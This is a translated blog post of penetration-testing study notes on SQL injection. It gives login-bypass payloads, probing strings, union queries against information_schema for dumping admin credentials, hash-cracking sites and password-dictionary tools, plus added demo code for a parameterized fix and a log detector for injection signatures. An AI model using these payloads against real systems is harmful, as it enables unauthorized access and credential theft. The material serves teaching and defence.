2019-9-10: Penetration testing basics: SQL injection notes

SQL injection
1. The universal password. Build your own website with a login form; the login must talk to the database. If malicious input is spliced into the statement, you can log in without any account or password: the malicious input becomes a universal password. The final spliced SQL statement is: SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';
If the back end does not sanitize the user input, you can enter the username admin' or 1=1 # and use the single quote to close the string.
Comment symbols: #, --, %25%2d%2d, --+
Enter: admin' and 1=1 #
admin' or 1=1 limit 0,1 #
Whether a single quote is needed depends on the data type: a string value needs the closing quote added, an integer value does not.
Resulting statement: select * from `users` where user = '$user' or '1'='1' and password = '$pass';

Why the universal password works
The parameters passed from the front end can be controlled; the back end splices the user input into the statement it executes, so the input is treated as code, contrary to the principle of separating code from data.
In short: the data the front end sends to the back end is not filtered, or not filtered strictly, which leads to universal-password SQL injection.
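The vulnerable splice described above, shown next to a parameterized fix, as an added example that is not from the original notes. It uses an in-memory SQLite database with a constructed users table, and the -- comment form from the comment list, because SQLite does not treat # as a comment.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the page's `users` table (in memory, sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2')")
    conn.commit()
    return conn

def build_spliced_sql(user, password):
    """The vulnerable pattern: input text becomes part of the statement text."""
    return f"SELECT user FROM users WHERE user = '{user}' AND password = '{password}';"

def login_spliced(conn, user, password):
    """Vulnerable login: executes the spliced text; returns the matched user names."""
    sql = build_spliced_sql(user, password)
    return sorted(row[0] for row in conn.execute(sql))

def login_parameterized(conn, user, password):
    """Hardened login: the statement is fixed, input only ever binds as data."""
    sql = "SELECT user FROM users WHERE user = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (user, password)))

if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1 -- "      # the page's universal password, -- comment form
    print(build_spliced_sql(payload, "wrong"))
    print("spliced:", login_spliced(db, payload, "wrong"))          # every user matches
    print("parameterized:", login_parameterized(db, payload, "wrong"))  # no match
```

With the spliced version the quote closes the string, `or 1=1` makes the WHERE clause true for every row, and the comment discards the password check; with placeholders the same text is compared literally against the user column and matches nothing.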

Harm: data leakage, database dumping (dragging the library), site tampering, database destruction, backdoor / getshell.

SQL injection classification
Request method: GET, POST, cookie
Parameter form: integer, character (string), search
Feedback type: error, union, time delay, Boolean (page display state)
Database type: Access, MSSQL, MySQL, Oracle, NoSQL, etc.
Technique used: Boolean, error-based, inline query, stacked queries, time-based, union

Manual injection
Common database functions and constants
ascii()
user()
version()
database()
concat()
group_concat()
concat_ws()
substr(s, start, len): string interception function with three parameters: the string to cut, the start index, and the length to take
substring(s, start, len): common to MySQL and MSSQL
mid(): MySQL only
left(s, n): takes from the left; s is the string, n the length to take
right(s, n): takes from the right; s is the string, n the length to take
if(condition, value_if_true, value_if_false): takes three parameters; the first is the condition, the second is the value or statement returned when the condition is true, the third is the value or statement returned when it is not, for example IF(1=1, "true", "false")
CASE marks the start of the function and END marks the end. If condition1 holds, result1 is returned; if condition2 holds, result2 is returned; when none holds the ELSE result is returned, and once one condition holds the later ones are not evaluated.
length(): computes string length

@@tmpdir
@@datadir
@@basedir
@@version
@@hostname

Union query, used to collect information
select * from users where id = 1 union select 1,2,3
If the query before the union returns no rows, the values from the statement after the union are displayed.

MySQL structure: a database holds tables, a table holds fields (three levels)
MySQL 5.0 and later has the information_schema database, a system database that summarizes the other databases: database names, table names and field names
The columns table stores database names, table names and field names
Fields of the columns table to note:
table_schema: the database name
table_name: the table name
column_name: the field name

Manual injection
1. Detect the injection point (there may be several). Look for id-like parameters (id / uid / typeid / sid / key), then append probing payloads after them:
' single quote
" double quote
' and 1=1--
0' or '1'='1
Whether quotes are needed is determined by the SQL statement spliced in the back end. If the malicious payload executes successfully (judged from the page and the error messages), there is an SQL injection point.
Next determine the injection method: error-based, Boolean, stacked and so on, decided mainly by what the page echoes, for example time-based using sleep(). Then determine the number of columns selected from the back-end database and which columns are displayed.

2. Collect information about the back-end database. With union, determine which column positions are echoed by the returned result, then replace those column positions with functions such as database(), user() and so on to view the information.

3. Get the table names of the current database, for example: SELECT GROUP_CONCAT(DISTINCT table_name) FROM information_schema.COLUMNS WHERE table_schema = 'jdycms'

4. Get the field names of the specified table in the current database, for example: SELECT GROUP_CONCAT(DISTINCT column_name) FROM information_schema.COLUMNS WHERE table_schema = database() AND table_name = 'jdy_admin'

5. Get the values: select concat(username, 0x7e, password) from jdy_admin

6. Crack the hashes: pmd5, cmd5, chamd5, somd5

7. Find the admin login page: directory guessing, information gathering, directory scanning
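The classification above (union, time, Boolean, stacked) and the probing and information_schema steps leave a visible trace in web server logs. As an added example that is not from the original notes, this detector runs those technique signatures over constructed access-log lines, decoding the path twice so double-URL-encoded payloads are matched too. The signatures and log lines are constructed here, not taken from the page.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-format line: client IP, method, path, status (other fields ignored).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# One signature per technique named in the notes (constructed, not exhaustive).
SIGNATURES = {
    "union":   re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I),
    "time":    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "boolean": re.compile(r"\b(and|or)\b\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),
    "stacked": re.compile(r";\s*(select|insert|update|delete|drop|exec)\b", re.I),
    "schema":  re.compile(r"\binformation_schema\.", re.I),
    "comment": re.compile(r"--|#|/\*"),
}

def decode_path(path):
    """Decode twice so a double-URL-encoded payload is seen in its plain form."""
    return unquote_plus(unquote_plus(path))

def classify(path):
    """Return the sorted technique tags whose signature matches the decoded path."""
    decoded = decode_path(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan(lines):
    """Return one hit per request whose path matches at least one signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        tags = classify(path)
        if tags:
            hits.append({"ip": ip, "method": method, "path": path, "tags": tags})
    return hits

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2019:10:00:01 +0800] "GET /news.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Sep/2019:10:00:02 +0800] "GET /news.php?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.columns HTTP/1.1" 200 640',
    '203.0.113.5 - - [10/Sep/2019:10:00:03 +0800] "GET /news.php?id=1%27%20and%20sleep(5)%23 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Sep/2019:10:00:04 +0800] "GET /news.php?id=1%3B%20drop%20table%20users HTTP/1.1" 500 128',
    '203.0.113.5 - - [10/Sep/2019:10:00:05 +0800] "GET /news.php?id=1%2527%2520or%25201=1%2520--%2520 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["method"], hit["path"], hit["tags"])
```

POST bodies and cookies are not in an access log, so this only covers the GET request form; the other two request methods from the classification need application or WAF logging.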

CMS (content management system)
For a CMS note its name, version, known vulnerabilities and exploits.

Social-engineering password dictionary generators
pydictor: a powerful password generator
cupp: a social-engineering password generator targeted at a specific person
wordhound: builds a password dictionary from Twitter searches, PDF documents and subreddits
brutescrape: reads a site's page content, analyzes the pages and exports the results as a password dictionary
Easy Excellent password generator
Online generators


Source: www.cnblogs.com/sym945/p/11715315.html